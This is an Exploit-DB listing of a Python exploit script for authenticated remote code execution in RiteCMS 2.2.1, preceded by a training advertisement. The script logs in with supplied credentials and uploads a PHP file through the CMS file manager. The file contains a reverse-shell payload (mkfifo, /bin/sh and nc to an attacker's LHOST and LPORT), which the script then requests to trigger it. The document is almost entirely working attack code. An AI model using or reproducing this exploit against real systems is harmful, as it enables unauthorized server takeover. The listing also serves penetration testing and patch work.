RiteCMS 2.2.1 - Remote Code Execution (Authenticated)

EDB-ID:

48915

CVE:

N/A


Author:

H0j3n

Type:

webapps


Platform:

PHP

Date:

2020-10-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: H0j3n
# Vendor Homepage: http://ritecms.com/
# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
# Version: 2.2.1
# Tested on: Linux
# Reference: https://www.exploit-db.com/exploits/48636

# !/usr/bin/python
# coding=utf-8
import requests,sys,base64,os
from colorama import Fore, Back, Style
from requests_toolbelt.multipart.encoder import MultipartEncoder
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Variable
CONTENT = '''<form action="index.php" method="post">'''

# Header
def header():
	top = cyan('''
 \t _____  _ _        _____ __  __  _____ 
 \t|  __ \(_) |      / ____|  \/  |/ ____|
 \t| |__) |_| |_ ___| |    | \  / | (___              ___    ___   ___
 \t|  _  /| | __/ _ \ |    | |\/| |\___ \     _  __  |_  |  |_  | <  /
 \t| | \ \| | ||  __/ |____| |  | |____) |   | |/ / / __/_ / __/_ / / 
 \t|_|  \_\_|\__\___|\_____|_|  |_|_____/    |___/ /____(_)____(_)_/                                      
''')
    	return top 

def info():
	top = cyan('''
[+] IP : {0}
[+] USERNAME : {1}
[+] PASSWORD : {2}
'''.format(IP,USER,PASS))

	return top
    
# Request Function
# Color Function
def cyan(STRING):
    return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET
    
def red(STRING):
    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET

    
# Main    	
if __name__ == "__main__":
	print header()
	print "\t--------------------------------------------------------------"
        print "\t|  RiteCMS v2.2.1 - Authenticated Remote Code Execution      |"
	print "\t--------------------------------------------------------------"
	print "\t| Reference : https://www.exploit-db.com/exploits/48636      |"
	print "\t| By        : H0j3n                                          |"
	print "\t--------------------------------------------------------------"
	if len(sys.argv) == 1:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Please Put IP & Credentials")
		sys.exit(-1)
	if len(sys.argv) == 2:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Please Put Credentials")
		sys.exit(-1)
	if len(sys.argv) > 3:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Only 2 arguments needed please see the usage!")
		sys.exit(-1)	
	IP = sys.argv[1]
	USER,PASS = sys.argv[2].split(":")
	print info()

	URL='{0}/cms/index.php'.format(IP)
	URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'

	HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
	LOG_INFO = {"username" : USER, "userpw" : PASS}
	try:
		with requests.Session() as SESSION:
		    SESSION.get(URL)
		    SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
	except:
		print red("[-] Check the URL!")
		sys.exit(-1)		
	if CONTENT in str(SESSION.get(URL_UPLOAD).text):
		print red("[-] Cannot Login!")
		sys.exit(-1)	
	else:
		print cyan("[+] Credentials Working!")
	LHOST = str(raw_input("Enter LHOST : "))
	LPORT = str(raw_input("Enter LPORT : "))
	FILENAME = str(raw_input("Enter FileName (include.php) : "))
	PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)
	FORM_DATA = {
	    'mode': (None,'filemanager'),
	    'file': (FILENAME, PAYLOAD),
	    'directory': (None, 'media'),
	    'file_name': (None, ''),
	    'upload_mode': (None, '1'),
	    'resize_xy': (None, 'x'),
	    'resize': (None, '640'),
	    'compression': (None, '80'),
	    'thumbnail_resize_xy': (None, 'x'),
	    'thumbnail_resize': (None, '150'),
	    'thumbnail_compression': (None, '70'),
	    'upload_file_submit': (None, 'OK - Upload file')
	}
	HEADER_UPLOAD = {
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Language': 'en-US,en;q=0.5',
	'Accept-Encoding': 'gzip, deflate',
	'Referer': URL_UPLOAD
	}
	response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
	if FILENAME in response.text:
		print cyan("\n[+] File uploaded and can be found!")
	else:
		print red("[-] File cannot be found or use different file name!")
		sys.exit(-1)
	URL_GET = IP + '/media/{0}'.format(FILENAME)
	OPTIONS = str(raw_input("Exploit Now (y/n)?"))
	print cyan("\nW0rk1ng!!! Enjoy :)")
	SESSION.get(URL_GET)